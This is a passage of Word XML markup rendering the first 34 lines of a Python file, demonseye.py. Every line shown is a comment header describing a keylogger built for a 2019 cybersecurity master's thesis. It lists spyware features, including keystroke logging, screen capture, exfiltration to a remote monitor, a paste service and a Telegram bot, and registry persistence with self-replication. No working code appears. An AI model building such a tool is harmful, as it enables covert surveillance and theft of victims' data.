                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>demonseye.py</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="348" w:name="l1"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">1    </w:t>
      </w:r>
      <w:bookmarkEnd w:id="348"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s01"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>#!/usr/bin/env python3</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="349" w:name="l2"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">2    </w:t>
      </w:r>
      <w:bookmarkEnd w:id="349"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s01"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t># -*- coding: utf-8 -*-</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="350" w:name="l3"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">3    </w:t>
      </w:r>
      <w:bookmarkEnd w:id="350"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s01"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>#</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="351" w:name="l4"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">4    </w:t>
      </w:r>
      <w:bookmarkEnd w:id="351"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s01"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t># -----------------------------------------------------------------------------------------------------------</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="352" w:name="l5"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">5    </w:t>
      </w:r>
      <w:bookmarkEnd w:id="352"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s01"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>#    ____                             _       _____             _  __          _</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="353" w:name="l6"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">6    </w:t>
      </w:r>
      <w:bookmarkEnd w:id="353"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s01"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>#   |  _ \  ___ _ __ ___   ___  _ __ ( )___  | ____|   _  ___  | |/ /___ _   _| | ___   __ _  __ _  ___ _ __</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="354" w:name="l7"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">7    </w:t>
      </w:r>
      <w:bookmarkEnd w:id="354"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s01"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>#   | | | |/ _ \ '_ ` _ \ / _ \| '_ \|// __| |  _|| | | |/ _ \ | ' // _ \ | | | |/ _ \ / _` |/ _` |/ _ \ '__|</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="355" w:name="l8"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">8    </w:t>
      </w:r>
      <w:bookmarkEnd w:id="355"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s01"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>#   | |_| |  __/ | | | | | (_) | | | | \__ \ | |__| |_| |  __/ | . \  __/ |_| | | (_) | (_| | (_| |  __/ |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="356" w:name="l9"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">9    </w:t>
      </w:r>
      <w:bookmarkEnd w:id="356"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s01"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>#   |____/ \___|_| |_| |_|\___/|_| |_| |___/ |_____\__, |\___| |_|\_\___|\__, |_|\___/ \__, |\__, |\___|_|</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="357" w:name="l10"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">10   </w:t>
      </w:r>
      <w:bookmarkEnd w:id="357"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s01"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>#                                                  |___/                 |___/         |___/ |___/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="358" w:name="l11"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">11   </w:t>
      </w:r>
      <w:bookmarkEnd w:id="358"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s01"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t># -----------------------------------------------------------------------------------------------------------</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="359" w:name="l12"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">12   </w:t>
      </w:r>
      <w:bookmarkEnd w:id="359"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s01"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t># Name:             demonseye.py</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="360" w:name="l13"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">13   </w:t>
      </w:r>
      <w:bookmarkEnd w:id="360"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s01"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t># Purpose:          ES - Desarrollo de un keylogger para el TFM del Master en Ciberseguridad de La Salle 2019</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="361" w:name="l14"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">14   </w:t>
      </w:r>
      <w:bookmarkEnd w:id="361"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s01"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>#                   EN - Development of a keylogger for the TFM of the Master in Cybersecurity of La Salle 2019</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="362" w:name="l15"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">15   </w:t>
      </w:r>
      <w:bookmarkEnd w:id="362"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s01"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>#</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="363" w:name="l16"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">16   </w:t>
      </w:r>
      <w:bookmarkEnd w:id="363"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s01"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t># Author:           Gabriel Marti Fuentes</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="364" w:name="l17"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">17   </w:t>
      </w:r>
      <w:bookmarkEnd w:id="364"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s01"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t># email:            gabimarti at gmail dot com</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="365" w:name="l18"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">18   </w:t>
      </w:r>
      <w:bookmarkEnd w:id="365"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s01"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t># GitHub:           https://github.com/gabimarti</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="366" w:name="l19"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">19   </w:t>
      </w:r>
      <w:bookmarkEnd w:id="366"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s01"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t># Created:          19/05/2019</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="367" w:name="l20"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">20   </w:t>
      </w:r>
      <w:bookmarkEnd w:id="367"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s01"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t># License:          GPLv3</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="368" w:name="l21"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">21   </w:t>
      </w:r>
      <w:bookmarkEnd w:id="368"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s01"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t># First Release:    04/09/2019</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="369" w:name="l22"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">22   </w:t>
      </w:r>
      <w:bookmarkEnd w:id="369"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s01"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t># Version:          0.0.2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="370" w:name="l23"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">23   </w:t>
      </w:r>
      <w:bookmarkEnd w:id="370"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s01"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>#</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="371" w:name="l24"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">24   </w:t>
      </w:r>
      <w:bookmarkEnd w:id="371"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s01"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t># Features:         * Record keystrokes</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="372" w:name="l25"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">25   </w:t>
      </w:r>
      <w:bookmarkEnd w:id="372"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s01"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>#                   * Periodic screen capture</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="373" w:name="l26"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">26   </w:t>
      </w:r>
      <w:bookmarkEnd w:id="373"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s01"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>#                   * Send data to a remote computer with Monitor App</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="374" w:name="l27"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">27   </w:t>
      </w:r>
      <w:bookmarkEnd w:id="374"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s01"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>#                   * Paste data to a Paste service</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="375" w:name="l28"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">28   </w:t>
      </w:r>
      <w:bookmarkEnd w:id="375"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s01"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>#                   * Send images and paste urls to a Telegram private Channel with a Telegram Bot</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="376" w:name="l29"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">29   </w:t>
      </w:r>
      <w:bookmarkEnd w:id="376"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s01"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>#                   * Self replicate and install on Windows Registry to maintain persistence</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="377" w:name="l30"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">30   </w:t>
      </w:r>
      <w:bookmarkEnd w:id="377"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s01"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>#                   * Two methods of keystroke capture using different modules</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="378" w:name="l31"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">31   </w:t>
      </w:r>
      <w:bookmarkEnd w:id="378"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s01"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>#</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="379" w:name="l32"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">32   </w:t>
      </w:r>
      <w:bookmarkEnd w:id="379"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s01"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t># Build info:       For required modules and executable generation, please read the files in the /docs folder.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="380" w:name="l33"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">33   </w:t>
      </w:r>
      <w:bookmarkEnd w:id="380"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s01"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>#</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="381" w:name="l34"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">34   </w:t>
      </w:r>
      <w:bookmarkEnd w:id="381"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s01"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t># Notes:            This code has been tested, developed and designed to work in a Windows 10 x64 environment.</w:t>
      </w:r>
    </w:p>
